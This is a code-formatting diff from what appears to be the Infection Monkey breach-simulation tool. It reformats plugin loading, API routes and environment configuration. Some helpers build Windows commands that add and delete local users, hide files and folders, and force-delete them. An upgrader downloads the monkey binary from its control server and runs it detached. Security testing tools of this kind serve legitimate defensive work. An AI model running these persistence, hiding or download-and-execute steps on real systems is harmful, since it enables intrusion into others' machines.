+ file, cls.base_package_name()) # Get all classes in a module # m[1] because return object is (name,class) - classes = [m[1] for m in inspect.getmembers(module, inspect.isclass) - if ((m[1].__module__ == module.__name__) and issubclass(m[1], cls))] + classes = [ + m[1] + for m in inspect.getmembers(module, inspect.isclass) + if ((m[1].__module__ == module.__name__) and issubclass(m[1], cls)) + ] # Get object from class for class_object in classes: LOG.debug("Checking if should run object {}".format(class_object.__name__)) @@ -50,7 +54,11 @@ class Plugin(metaclass=ABCMeta): objects.append(class_object) LOG.debug("Added {} to list".format(class_object.__name__)) except Exception as e: - LOG.warning("Exception {} when checking if {} should run".format(str(e), class_object.__name__)) + LOG.warning( + "Exception {} when checking if {} should run".format( + str(e), class_object.__name__ + ) + ) return objects @classmethod @@ -67,7 +75,9 @@ class Plugin(metaclass=ABCMeta): instance = class_object() instances.append(instance) except Exception as e: - LOG.warning("Exception {} when initializing {}".format(str(e), class_object.__name__)) + LOG.warning( + "Exception {} when initializing {}".format(str(e), class_object.__name__) + ) return instances @staticmethod diff --git a/monkey/infection_monkey/utils/plugins/pluginTests/BadInit.py b/monkey/infection_monkey/utils/plugins/pluginTests/BadInit.py index 18e83c052..7e4c93940 100644 --- a/monkey/infection_monkey/utils/plugins/pluginTests/BadInit.py +++ b/monkey/infection_monkey/utils/plugins/pluginTests/BadInit.py @@ -2,6 +2,5 @@ from infection_monkey.utils.plugins.pluginTests.PluginTestClass import TestPlugi class BadPluginInit(TestPlugin): - def __init__(self): raise Exception("TestException") diff --git a/monkey/infection_monkey/utils/plugins/pluginTests/ComboFile.py b/monkey/infection_monkey/utils/plugins/pluginTests/ComboFile.py index 2d73cd65b..09abae314 100644 --- a/monkey/infection_monkey/utils/plugins/pluginTests/ComboFile.py +++ b/monkey/infection_monkey/utils/plugins/pluginTests/ComboFile.py @@ -6,7 +6,6 @@ class NoInheritance: class BadInit(TestPlugin): - def __init__(self): raise Exception("TestException") diff --git a/monkey/infection_monkey/utils/plugins/plugin_test.py b/monkey/infection_monkey/utils/plugins/plugin_test.py index c587bfed2..d8034c016 100644 --- a/monkey/infection_monkey/utils/plugins/plugin_test.py +++ b/monkey/infection_monkey/utils/plugins/plugin_test.py @@ -8,7 +8,6 @@ from infection_monkey.utils.plugins.pluginTests.PluginWorking import PluginWorki class PluginTester(TestCase): - def test_combo_file(self): TestPlugin.classes_to_load = [BadInit.__name__, ProperClass.__name__] to_init = TestPlugin.get_classes() diff --git a/monkey/infection_monkey/utils/windows/hidden_files.py b/monkey/infection_monkey/utils/windows/hidden_files.py index d5687fc2d..818c88a6e 100644 --- a/monkey/infection_monkey/utils/windows/hidden_files.py +++ b/monkey/infection_monkey/utils/windows/hidden_files.py @@ -9,55 +9,58 @@ HIDDEN_FILE_WINAPI = HOME_PATH + "\\monkey-hidden-file-winAPI" def get_windows_commands_to_hide_files(): return [ - 'echo', - 'Successfully created hidden file: {}'.format(HIDDEN_FILE), # create empty file - '>', + "echo", + "Successfully created hidden file: {}".format(HIDDEN_FILE), # create empty file + ">", HIDDEN_FILE, - '&&', - 'attrib', # change file attributes - '+h', # hidden attribute - '+s', # system attribute + "&&", + "attrib", # change file attributes + "+h", # hidden attribute + "+s", # system attribute + 
HIDDEN_FILE, + "&&", + "type", HIDDEN_FILE, - '&&', - 'type', - HIDDEN_FILE ] def get_windows_commands_to_hide_folders(): return [ - 'mkdir', + "mkdir", HIDDEN_FOLDER, # make directory - '&&', - 'attrib', - '+h', # hidden attribute - '+s', # system attribute + "&&", + "attrib", + "+h", # hidden attribute + "+s", # system attribute HIDDEN_FOLDER, # change file attributes - '&&', - 'echo', - 'Successfully created hidden folder: {}'.format(HIDDEN_FOLDER), - '>', - '{}\\{}'.format(HIDDEN_FOLDER, 'some-file'), - '&&', - 'type', - '{}\\{}'.format(HIDDEN_FOLDER, 'some-file') + "&&", + "echo", + "Successfully created hidden folder: {}".format(HIDDEN_FOLDER), + ">", + "{}\\{}".format(HIDDEN_FOLDER, "some-file"), + "&&", + "type", + "{}\\{}".format(HIDDEN_FOLDER, "some-file"), ] def get_winAPI_to_hide_files(): import win32file + try: fileAccess = win32file.GENERIC_READ | win32file.GENERIC_WRITE # read-write access fileCreation = win32file.CREATE_ALWAYS # overwrite existing file fileFlags = win32file.FILE_ATTRIBUTE_HIDDEN # make hidden - win32file.CreateFile(HIDDEN_FILE_WINAPI, - fileAccess, - 0, # sharing mode: 0 => can't be shared - None, # security attributes - fileCreation, - fileFlags, - 0) # template file + win32file.CreateFile( + HIDDEN_FILE_WINAPI, + fileAccess, + 0, # sharing mode: 0 => can't be shared + None, # security attributes + fileCreation, + fileFlags, + 0, + ) # template file return "Succesfully created hidden file: {}".format(HIDDEN_FILE_WINAPI), True except Exception as err: @@ -66,15 +69,15 @@ def get_winAPI_to_hide_files(): def get_windows_commands_to_delete(): return [ - 'powershell.exe', - 'del', # delete file - '-Force', + "powershell.exe", + "del", # delete file + "-Force", HIDDEN_FILE, - ',', + ",", HIDDEN_FILE_WINAPI, - ';', - 'rmdir', # delete folder - '-Force', - '-Recurse', - HIDDEN_FOLDER + ";", + "rmdir", # delete folder + "-Force", + "-Recurse", + HIDDEN_FOLDER, ] diff --git a/monkey/infection_monkey/utils/windows/users.py b/monkey/infection_monkey/utils/windows/users.py index c16b1c190..9e5913673 100644 --- a/monkey/infection_monkey/utils/windows/users.py +++ b/monkey/infection_monkey/utils/windows/users.py @@ -4,38 +4,25 @@ import subprocess from infection_monkey.utils.auto_new_user import AutoNewUser from infection_monkey.utils.new_user_error import NewUserError -ACTIVE_NO_NET_USER = '/ACTIVE:NO' +ACTIVE_NO_NET_USER = "/ACTIVE:NO" WAIT_TIMEOUT_IN_MILLISECONDS = 60 * 1000 logger = logging.getLogger(__name__) def get_windows_commands_to_add_user(username, password, should_be_active=False): - windows_cmds = [ - 'net', - 'user', - username, - password, - '/add'] + windows_cmds = ["net", "user", username, password, "/add"] if not should_be_active: windows_cmds.append(ACTIVE_NO_NET_USER) return windows_cmds def get_windows_commands_to_delete_user(username): - return [ - 'net', - 'user', - username, - '/delete'] + return ["net", "user", username, "/delete"] def get_windows_commands_to_deactivate_user(username): - return [ - 'net', - 'user', - username, - ACTIVE_NO_NET_USER] + return ["net", "user", username, ACTIVE_NO_NET_USER] class AutoNewWindowsUser(AutoNewUser): @@ -66,7 +53,8 @@ class AutoNewWindowsUser(AutoNewUser): ".", # Use current domain. self.password, win32con.LOGON32_LOGON_INTERACTIVE, # Logon type - interactive (normal user), since we're using a shell. - win32con.LOGON32_PROVIDER_DEFAULT) # Which logon provider to use - whatever Windows offers. + win32con.LOGON32_PROVIDER_DEFAULT, + ) # Which logon provider to use - whatever Windows offers. 
except Exception as err: raise NewUserError("Can't logon as {}. Error: {}".format(self.username, str(err))) return self @@ -86,22 +74,20 @@ class AutoNewWindowsUser(AutoNewUser): # Open process as that user # https://github.com/tjguk/winsys/blob/master/winsys/_advapi32.py proc_info = _advapi32.CreateProcessWithLogonW( - username=self.username, - domain=".", - password=self.password, - command_line=command + username=self.username, domain=".", password=self.password, command_line=command ) process_handle = proc_info.hProcess thread_handle = proc_info.hThread logger.debug( - "Waiting for process to finish. Timeout: {}ms".format(WAIT_TIMEOUT_IN_MILLISECONDS)) + "Waiting for process to finish. Timeout: {}ms".format(WAIT_TIMEOUT_IN_MILLISECONDS) + ) # https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f-408d2a41750d/what-events-on-a-process-handle-signal-satisify-waitforsingleobject?forum=vcgeneral # Ignoring return code, as we'll use `GetExitCode` to determine the state of the process later. _ = win32event.WaitForSingleObject( # Waits until the specified object is signaled, or time-out. process_handle, # Ping process handle - WAIT_TIMEOUT_IN_MILLISECONDS # Timeout in milliseconds + WAIT_TIMEOUT_IN_MILLISECONDS, # Timeout in milliseconds ) exit_code = win32process.GetExitCodeProcess(process_handle) @@ -131,9 +117,13 @@ class AutoNewWindowsUser(AutoNewUser): try: commands_to_deactivate_user = get_windows_commands_to_deactivate_user(self.username) logger.debug( - "Trying to deactivate {} with commands {}".format(self.username, str(commands_to_deactivate_user))) + "Trying to deactivate {} with commands {}".format( + self.username, str(commands_to_deactivate_user) + ) + ) _ = subprocess.check_output( - commands_to_deactivate_user, stderr=subprocess.STDOUT, shell=True) + commands_to_deactivate_user, stderr=subprocess.STDOUT, shell=True + ) except Exception as err: raise NewUserError("Can't deactivate user {}. Info: {}".format(self.username, err)) @@ -141,8 +131,12 @@ class AutoNewWindowsUser(AutoNewUser): try: commands_to_delete_user = get_windows_commands_to_delete_user(self.username) logger.debug( - "Trying to delete {} with commands {}".format(self.username, str(commands_to_delete_user))) + "Trying to delete {} with commands {}".format( + self.username, str(commands_to_delete_user) + ) + ) _ = subprocess.check_output( - commands_to_delete_user, stderr=subprocess.STDOUT, shell=True) + commands_to_delete_user, stderr=subprocess.STDOUT, shell=True + ) except Exception as err: raise NewUserError("Can't delete user {}. 
Info: {}".format(self.username, err)) diff --git a/monkey/infection_monkey/windows_upgrader.py b/monkey/infection_monkey/windows_upgrader.py index 8b9ec7f80..cea71a326 100644 --- a/monkey/infection_monkey/windows_upgrader.py +++ b/monkey/infection_monkey/windows_upgrader.py @@ -11,7 +11,7 @@ from infection_monkey.exploit.tools.helpers import build_monkey_commandline_expl from infection_monkey.model import MONKEY_CMDLINE_WINDOWS from infection_monkey.utils.environment import is_64bit_python, is_64bit_windows_os, is_windows_os -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" LOG = logging.getLogger(__name__) @@ -26,31 +26,45 @@ class WindowsUpgrader(object): @staticmethod def should_upgrade(): - return is_windows_os() and is_64bit_windows_os() \ - and not is_64bit_python() + return is_windows_os() and is_64bit_windows_os() and not is_64bit_python() @staticmethod def upgrade(opts): try: monkey_64_path = ControlClient.download_monkey_exe_by_os(True, False) with monkeyfs.open(monkey_64_path, "rb") as downloaded_monkey_file: - with open(WormConfiguration.dropper_target_path_win_64, 'wb') as written_monkey_file: + with open( + WormConfiguration.dropper_target_path_win_64, "wb" + ) as written_monkey_file: shutil.copyfileobj(downloaded_monkey_file, written_monkey_file) except (IOError, AttributeError) as e: LOG.error("Failed to download the Monkey to the target path: %s." % e) return - monkey_options = build_monkey_commandline_explicitly(opts.parent, opts.tunnel, opts.server, opts.depth) + monkey_options = build_monkey_commandline_explicitly( + opts.parent, opts.tunnel, opts.server, opts.depth + ) - monkey_cmdline = MONKEY_CMDLINE_WINDOWS % { - 'monkey_path': WormConfiguration.dropper_target_path_win_64} + monkey_options + monkey_cmdline = ( + MONKEY_CMDLINE_WINDOWS % {"monkey_path": WormConfiguration.dropper_target_path_win_64} + + monkey_options + ) - monkey_process = subprocess.Popen(monkey_cmdline, shell=True, - stdin=None, stdout=None, stderr=None, - close_fds=True, creationflags=DETACHED_PROCESS) + monkey_process = subprocess.Popen( + monkey_cmdline, + shell=True, + stdin=None, + stdout=None, + stderr=None, + close_fds=True, + creationflags=DETACHED_PROCESS, + ) - LOG.info("Executed 64bit monkey process (PID=%d) with command line: %s", - monkey_process.pid, monkey_cmdline) + LOG.info( + "Executed 64bit monkey process (PID=%d) with command line: %s", + monkey_process.pid, + monkey_cmdline, + ) time.sleep(WindowsUpgrader.__UPGRADE_WAIT_TIME__) if monkey_process.poll() is not None: diff --git a/monkey/monkey_island/__init__.py b/monkey/monkey_island/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/monkey_island/__init__.py +++ b/monkey/monkey_island/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/monkey_island/cc/__init__.py b/monkey/monkey_island/cc/__init__.py index e593a854b..a37455d11 100644 --- a/monkey/monkey_island/cc/__init__.py +++ b/monkey/monkey_island/cc/__init__.py @@ -1 +1 @@ -__author__ = 'Barak' +__author__ = "Barak" diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index c7fd0006f..846a8663d 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -51,21 +51,25 @@ from monkey_island.cc.services.database import Database from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService from monkey_island.cc.services.representations import output_json -__author__ = 'Barak' +__author__ = "Barak" -HOME_FILE = 'index.html' +HOME_FILE = "index.html" 
def serve_static_file(static_path): - if static_path.startswith('api/'): + if static_path.startswith("api/"): raise NotFound() try: - return send_from_directory(os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc/ui/dist'), static_path) + return send_from_directory(os.path.join(MONKEY_ISLAND_ABS_PATH, "cc/ui/dist"), static_path) except NotFound: # Because react uses various urls for same index page, this is probably the user's intention. if static_path == HOME_FILE: flask_restful.abort( - Response("Page not found. Make sure you ran the npm script and the cwd is monkey\\monkey.", 500)) + Response( + "Page not found. Make sure you ran the npm script and the cwd is monkey\\monkey.", + 500, + ) + ) return serve_home() @@ -74,17 +78,17 @@ def serve_home(): def init_app_config(app, mongo_url): - app.config['MONGO_URI'] = mongo_url + app.config["MONGO_URI"] = mongo_url # See https://flask-jwt-extended.readthedocs.io/en/stable/options - app.config['JWT_ACCESS_TOKEN_EXPIRES'] = env_singleton.env.get_auth_expiration_time() + app.config["JWT_ACCESS_TOKEN_EXPIRES"] = env_singleton.env.get_auth_expiration_time() # Invalidate the signature of JWTs if the server process restarts. This avoids the edge case of getting a JWT, # deciding to reset credentials and then still logging in with the old JWT. - app.config['JWT_SECRET_KEY'] = str(uuid.uuid4()) + app.config["JWT_SECRET_KEY"] = str(uuid.uuid4()) # By default, Flask sorts keys of JSON objects alphabetically, which messes with the ATT&CK matrix in the # configuration. See https://flask.palletsprojects.com/en/1.1.x/config/#JSON_SORT_KEYS. - app.config['JSON_SORT_KEYS'] = False + app.config["JSON_SORT_KEYS"] = False app.json_encoder = CustomJSONEncoder @@ -102,62 +106,71 @@ def init_app_services(app): def init_app_url_rules(app): - app.add_url_rule('/', 'serve_home', serve_home) - app.add_url_rule('/', 'serve_static_file', serve_static_file) + app.add_url_rule("/", "serve_home", serve_home) + app.add_url_rule("/", "serve_static_file", serve_static_file) def init_api_resources(api): - api.add_resource(Root, '/api') - api.add_resource(Registration, '/api/registration') - api.add_resource(Authenticate, '/api/auth') - api.add_resource(Environment, '/api/environment') - api.add_resource(Monkey, '/api/monkey', '/api/monkey/', '/api/monkey/') - api.add_resource(Bootloader, '/api/bootloader/') - api.add_resource(LocalRun, '/api/local-monkey', '/api/local-monkey/') - api.add_resource(ClientRun, '/api/client-monkey', '/api/client-monkey/') - api.add_resource(Telemetry, '/api/telemetry', '/api/telemetry/', '/api/telemetry/') - api.add_resource(MonkeyConfiguration, '/api/configuration', '/api/configuration/') - api.add_resource(IslandConfiguration, '/api/configuration/island', '/api/configuration/island/') - api.add_resource(MonkeyDownload, '/api/monkey/download', '/api/monkey/download/', - '/api/monkey/download/') - api.add_resource(NetMap, '/api/netmap', '/api/netmap/') - api.add_resource(Edge, '/api/netmap/edge', '/api/netmap/edge/') - api.add_resource(Node, '/api/netmap/node', '/api/netmap/node/') - api.add_resource(NodeStates, '/api/netmap/nodeStates') + api.add_resource(Root, "/api") + api.add_resource(Registration, "/api/registration") + api.add_resource(Authenticate, "/api/auth") + api.add_resource(Environment, "/api/environment") + api.add_resource(Monkey, "/api/monkey", "/api/monkey/", "/api/monkey/") + api.add_resource(Bootloader, "/api/bootloader/") + api.add_resource(LocalRun, "/api/local-monkey", "/api/local-monkey/") + api.add_resource(ClientRun, 
"/api/client-monkey", "/api/client-monkey/") + api.add_resource( + Telemetry, "/api/telemetry", "/api/telemetry/", "/api/telemetry/" + ) + api.add_resource(MonkeyConfiguration, "/api/configuration", "/api/configuration/") + api.add_resource(IslandConfiguration, "/api/configuration/island", "/api/configuration/island/") + api.add_resource( + MonkeyDownload, + "/api/monkey/download", + "/api/monkey/download/", + "/api/monkey/download/", + ) + api.add_resource(NetMap, "/api/netmap", "/api/netmap/") + api.add_resource(Edge, "/api/netmap/edge", "/api/netmap/edge/") + api.add_resource(Node, "/api/netmap/node", "/api/netmap/node/") + api.add_resource(NodeStates, "/api/netmap/nodeStates") - api.add_resource(SecurityReport, '/api/report/security') - api.add_resource(ZeroTrustReport, '/api/report/zero-trust/') - api.add_resource(AttackReport, '/api/report/attack') + api.add_resource(SecurityReport, "/api/report/security") + api.add_resource(ZeroTrustReport, "/api/report/zero-trust/") + api.add_resource(AttackReport, "/api/report/attack") - api.add_resource(ZeroTrustFindingEvent, '/api/zero-trust/finding-event/') - api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/') - api.add_resource(Log, '/api/log', '/api/log/') - api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/') - api.add_resource(PBAFileDownload, '/api/pba/download/') + api.add_resource(ZeroTrustFindingEvent, "/api/zero-trust/finding-event/") + api.add_resource(TelemetryFeed, "/api/telemetry-feed", "/api/telemetry-feed/") + api.add_resource(Log, "/api/log", "/api/log/") + api.add_resource(IslandLog, "/api/log/island/download", "/api/log/island/download/") + api.add_resource(PBAFileDownload, "/api/pba/download/") api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH) - api.add_resource(FileUpload, '/api/fileUpload/', - '/api/fileUpload/?load=', - '/api/fileUpload/?restore=') - api.add_resource(RemoteRun, '/api/remote-monkey', '/api/remote-monkey/') - api.add_resource(AttackConfiguration, '/api/attack') - api.add_resource(VersionUpdate, '/api/version-update', '/api/version-update/') - api.add_resource(RemotePortCheck, '/api/monkey_control/check_remote_port/') - api.add_resource(StartedOnIsland, '/api/monkey_control/started_on_island') - api.add_resource(ScoutSuiteAuth, '/api/scoutsuite_auth/') - api.add_resource(AWSKeys, '/api/aws_keys') + api.add_resource( + FileUpload, + "/api/fileUpload/", + "/api/fileUpload/?load=", + "/api/fileUpload/?restore=", + ) + api.add_resource(RemoteRun, "/api/remote-monkey", "/api/remote-monkey/") + api.add_resource(AttackConfiguration, "/api/attack") + api.add_resource(VersionUpdate, "/api/version-update", "/api/version-update/") + api.add_resource(RemotePortCheck, "/api/monkey_control/check_remote_port/") + api.add_resource(StartedOnIsland, "/api/monkey_control/started_on_island") + api.add_resource(ScoutSuiteAuth, "/api/scoutsuite_auth/") + api.add_resource(AWSKeys, "/api/aws_keys") # Resources used by black box tests - api.add_resource(MonkeyTest, '/api/test/monkey') - api.add_resource(ClearCaches, '/api/test/clear_caches') - api.add_resource(LogTest, '/api/test/log') - api.add_resource(TelemetryTest, '/api/test/telemetry') + api.add_resource(MonkeyTest, "/api/test/monkey") + api.add_resource(ClearCaches, "/api/test/clear_caches") + api.add_resource(LogTest, "/api/test/log") + api.add_resource(TelemetryTest, "/api/test/telemetry") def init_app(mongo_url): app = Flask(__name__) api = flask_restful.Api(app) - api.representations = 
{'application/json': output_json} + api.representations = {"application/json": output_json} init_app_config(app, mongo_url) init_app_services(app) diff --git a/monkey/monkey_island/cc/arg_parser.py b/monkey/monkey_island/cc/arg_parser.py index 5ea12aec4..73b145dd4 100644 --- a/monkey/monkey_island/cc/arg_parser.py +++ b/monkey/monkey_island/cc/arg_parser.py @@ -1,6 +1,9 @@ from dataclasses import dataclass -from monkey_island.cc.server_utils.consts import DEFAULT_SERVER_CONFIG_PATH, DEFAULT_LOGGER_CONFIG_PATH +from monkey_island.cc.server_utils.consts import ( + DEFAULT_SERVER_CONFIG_PATH, + DEFAULT_LOGGER_CONFIG_PATH, +) @dataclass @@ -15,7 +18,7 @@ def parse_cli_args() -> IslandArgs: parser = argparse.ArgumentParser( description="Infection Monkey Island CnC Server. See https://infectionmonkey.com", - formatter_class=argparse.ArgumentDefaultsHelpFormatter + formatter_class=argparse.ArgumentDefaultsHelpFormatter, ) parser.add_argument( "-s", diff --git a/monkey/monkey_island/cc/database.py b/monkey/monkey_island/cc/database.py index 082553e5f..b7788178c 100644 --- a/monkey/monkey_island/cc/database.py +++ b/monkey/monkey_island/cc/database.py @@ -2,7 +2,7 @@ import gridfs from flask_pymongo import MongoClient, PyMongo from pymongo.errors import ServerSelectionTimeoutError -__author__ = 'Barak' +__author__ = "Barak" mongo = PyMongo() @@ -34,5 +34,5 @@ def get_db_version(mongo_url): :return: version as a tuple (e.g. `(u'4', u'0', u'8')`) """ client = MongoClient(mongo_url, serverSelectionTimeoutMS=100) - server_version = tuple(client.server_info()['version'].split('.')) + server_version = tuple(client.server_info()["version"].split(".")) return server_version diff --git a/monkey/monkey_island/cc/environment/__init__.py b/monkey/monkey_island/cc/environment/__init__.py index 75012183f..612428428 100644 --- a/monkey/monkey_island/cc/environment/__init__.py +++ b/monkey/monkey_island/cc/environment/__init__.py @@ -4,10 +4,13 @@ import os from abc import ABCMeta, abstractmethod from datetime import timedelta -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" -from common.utils.exceptions import (AlreadyRegisteredError, CredentialsNotRequiredError, - InvalidRegistrationCredentialsError) +from common.utils.exceptions import ( + AlreadyRegisteredError, + CredentialsNotRequiredError, + InvalidRegistrationCredentialsError, +) from monkey_island.cc.environment.environment_config import EnvironmentConfig from monkey_island.cc.environment.user_creds import UserCreds @@ -19,8 +22,10 @@ class Environment(object, metaclass=ABCMeta): _MONGO_DB_NAME = "monkeyisland" _MONGO_DB_HOST = "localhost" _MONGO_DB_PORT = 27017 - _MONGO_URL = os.environ.get("MONKEY_MONGO_URL", - "mongodb://{0}:{1}/{2}".format(_MONGO_DB_HOST, _MONGO_DB_PORT, str(_MONGO_DB_NAME))) + _MONGO_URL = os.environ.get( + "MONKEY_MONGO_URL", + "mongodb://{0}:{1}/{2}".format(_MONGO_DB_HOST, _MONGO_DB_PORT, str(_MONGO_DB_NAME)), + ) _DEBUG_SERVER = False _AUTH_EXPIRATION_TIME = timedelta(minutes=30) @@ -56,12 +61,14 @@ class Environment(object, metaclass=ABCMeta): def _try_needs_registration(self) -> bool: if not self._credentials_required: - raise CredentialsNotRequiredError("Credentials are not required " - "for current environment.") + raise CredentialsNotRequiredError( + "Credentials are not required " "for current environment." + ) else: if self._is_registered(): - raise AlreadyRegisteredError("User has already been registered. " - "Reset credentials or login.") + raise AlreadyRegisteredError( + "User has already been registered. 
" "Reset credentials or login." + ) return True def _is_registered(self) -> bool: @@ -102,11 +109,11 @@ class Environment(object, metaclass=ABCMeta): @staticmethod def hash_secret(secret): hash_obj = hashlib.sha3_512() - hash_obj.update(secret.encode('utf-8')) + hash_obj.update(secret.encode("utf-8")) return hash_obj.hexdigest() def get_deployment(self) -> str: - deployment = 'unknown' + deployment = "unknown" if self._config and self._config.deployment: deployment = self._config.deployment return deployment diff --git a/monkey/monkey_island/cc/environment/aws.py b/monkey/monkey_island/cc/environment/aws.py index b1ba0a734..89e7b428d 100644 --- a/monkey/monkey_island/cc/environment/aws.py +++ b/monkey/monkey_island/cc/environment/aws.py @@ -1,7 +1,7 @@ from common.cloud.aws.aws_instance import AwsInstance from monkey_island.cc.environment import Environment -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class AwsEnvironment(Environment): diff --git a/monkey/monkey_island/cc/environment/environment_config.py b/monkey/monkey_island/cc/environment/environment_config.py index f390d8186..731ecfe34 100644 --- a/monkey/monkey_island/cc/environment/environment_config.py +++ b/monkey/monkey_island/cc/environment/environment_config.py @@ -40,9 +40,7 @@ class EnvironmentConfig: def _load_from_dict(self, dict_data: Dict): user_creds = UserCreds.get_from_dict(dict_data) aws = dict_data["aws"] if "aws" in dict_data else None - data_dir = ( - dict_data["data_dir"] if "data_dir" in dict_data else DEFAULT_DATA_DIR - ) + data_dir = dict_data["data_dir"] if "data_dir" in dict_data else DEFAULT_DATA_DIR self.server_config = dict_data["server_config"] self.deployment = dict_data["deployment"] diff --git a/monkey/monkey_island/cc/environment/environment_singleton.py b/monkey/monkey_island/cc/environment/environment_singleton.py index 0c7262a96..e7e316ac5 100644 --- a/monkey/monkey_island/cc/environment/environment_singleton.py +++ b/monkey/monkey_island/cc/environment/environment_singleton.py @@ -1,22 +1,21 @@ import logging import monkey_island.cc.resources.auth.user_store as user_store -from monkey_island.cc.environment import (EnvironmentConfig, aws, password, - standard) +from monkey_island.cc.environment import EnvironmentConfig, aws, password, standard from monkey_island.cc.server_utils.consts import DEFAULT_SERVER_CONFIG_PATH -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" logger = logging.getLogger(__name__) -AWS = 'aws' -STANDARD = 'standard' -PASSWORD = 'password' +AWS = "aws" +STANDARD = "standard" +PASSWORD = "password" ENV_DICT = { STANDARD: standard.StandardEnvironment, AWS: aws.AwsEnvironment, - PASSWORD: password.PasswordEnvironment + PASSWORD: password.PasswordEnvironment, } env = None @@ -32,8 +31,8 @@ def set_to_standard(): global env if env: env_config = env.get_config() - env_config.server_config = 'standard' - set_env('standard', env_config) + env_config.server_config = "standard" + set_env("standard", env_config) env.save_config() user_store.UserStore.set_users(env.get_auth_users()) @@ -45,9 +44,9 @@ def initialize_from_file(file_path): __env_type = config.server_config set_env(__env_type, config) # noinspection PyUnresolvedReferences - logger.info('Monkey\'s env is: {0}'.format(env.__class__.__name__)) + logger.info("Monkey's env is: {0}".format(env.__class__.__name__)) except Exception: - logger.error('Failed initializing environment', exc_info=True) + logger.error("Failed initializing environment", exc_info=True) raise diff --git 
a/monkey/monkey_island/cc/environment/password.py b/monkey/monkey_island/cc/environment/password.py index 8cfd495d2..88d1f76f0 100644 --- a/monkey/monkey_island/cc/environment/password.py +++ b/monkey/monkey_island/cc/environment/password.py @@ -1,6 +1,6 @@ from monkey_island.cc.environment import Environment -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class PasswordEnvironment(Environment): diff --git a/monkey/monkey_island/cc/environment/set_server_config.py b/monkey/monkey_island/cc/environment/set_server_config.py index f3fbd66ff..490d92479 100644 --- a/monkey/monkey_island/cc/environment/set_server_config.py +++ b/monkey/monkey_island/cc/environment/set_server_config.py @@ -62,5 +62,5 @@ def restore_previous_config(config_path): move(BACKUP_CONFIG_FILENAME, config_path) -if __name__ == '__main__': +if __name__ == "__main__": main() diff --git a/monkey/monkey_island/cc/environment/standard.py b/monkey/monkey_island/cc/environment/standard.py index e34fb71cc..8135e8e3f 100644 --- a/monkey/monkey_island/cc/environment/standard.py +++ b/monkey/monkey_island/cc/environment/standard.py @@ -1,7 +1,7 @@ from monkey_island.cc.environment import Environment from monkey_island.cc.resources.auth.auth_user import User -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class StandardEnvironment(Environment): @@ -9,8 +9,10 @@ class StandardEnvironment(Environment): _credentials_required = False # SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()' - NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \ - '8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557' + NO_AUTH_CREDS = ( + "55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062" + "8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557" + ) def get_auth_users(self): return [User(1, StandardEnvironment.NO_AUTH_CREDS, StandardEnvironment.NO_AUTH_CREDS)] diff --git a/monkey/monkey_island/cc/environment/test__init__.py b/monkey/monkey_island/cc/environment/test__init__.py index fde0a8b27..aea1263c2 100644 --- a/monkey/monkey_island/cc/environment/test__init__.py +++ b/monkey/monkey_island/cc/environment/test__init__.py @@ -5,22 +5,23 @@ from unittest import TestCase from unittest.mock import MagicMock, patch from monkey_island.cc.server_utils.consts import MONKEY_ISLAND_ABS_PATH -from common.utils.exceptions import (AlreadyRegisteredError, - CredentialsNotRequiredError, - InvalidRegistrationCredentialsError, - RegistrationNotNeededError) -from monkey_island.cc.environment import (Environment, EnvironmentConfig, - UserCreds) +from common.utils.exceptions import ( + AlreadyRegisteredError, + CredentialsNotRequiredError, + InvalidRegistrationCredentialsError, + RegistrationNotNeededError, +) +from monkey_island.cc.environment import Environment, EnvironmentConfig, UserCreds TEST_RESOURCES_DIR = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "testing", "environment") WITH_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_with_credentials.json") NO_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_no_credentials.json") PARTIAL_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_partial_credentials.json") -STANDARD_WITH_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, - "server_config_standard_with_credentials.json") -STANDARD_ENV = os.path.join(TEST_RESOURCES_DIR, - "server_config_standard_env.json") +STANDARD_WITH_CREDENTIALS = os.path.join( + TEST_RESOURCES_DIR, "server_config_standard_with_credentials.json" +) 
+STANDARD_ENV = os.path.join(TEST_RESOURCES_DIR, "server_config_standard_env.json") def get_tmp_file(): @@ -40,14 +41,13 @@ class StubEnvironmentConfig(EnvironmentConfig): def get_server_config_file_path_test_version(): - return os.path.join(os.getcwd(), 'test_config.json') + return os.path.join(os.getcwd(), "test_config.json") class TestEnvironment(TestCase): - class EnvironmentCredentialsNotRequired(Environment): def __init__(self): - config = StubEnvironmentConfig('test', 'test', UserCreds()) + config = StubEnvironmentConfig("test", "test", UserCreds()) super().__init__(config) _credentials_required = False @@ -57,7 +57,7 @@ class TestEnvironment(TestCase): class EnvironmentCredentialsRequired(Environment): def __init__(self): - config = StubEnvironmentConfig('test', 'test', UserCreds()) + config = StubEnvironmentConfig("test", "test", UserCreds()) super().__init__(config) _credentials_required = True @@ -67,7 +67,7 @@ class TestEnvironment(TestCase): class EnvironmentAlreadyRegistered(Environment): def __init__(self): - config = StubEnvironmentConfig('test', 'test', UserCreds('test_user', 'test_secret')) + config = 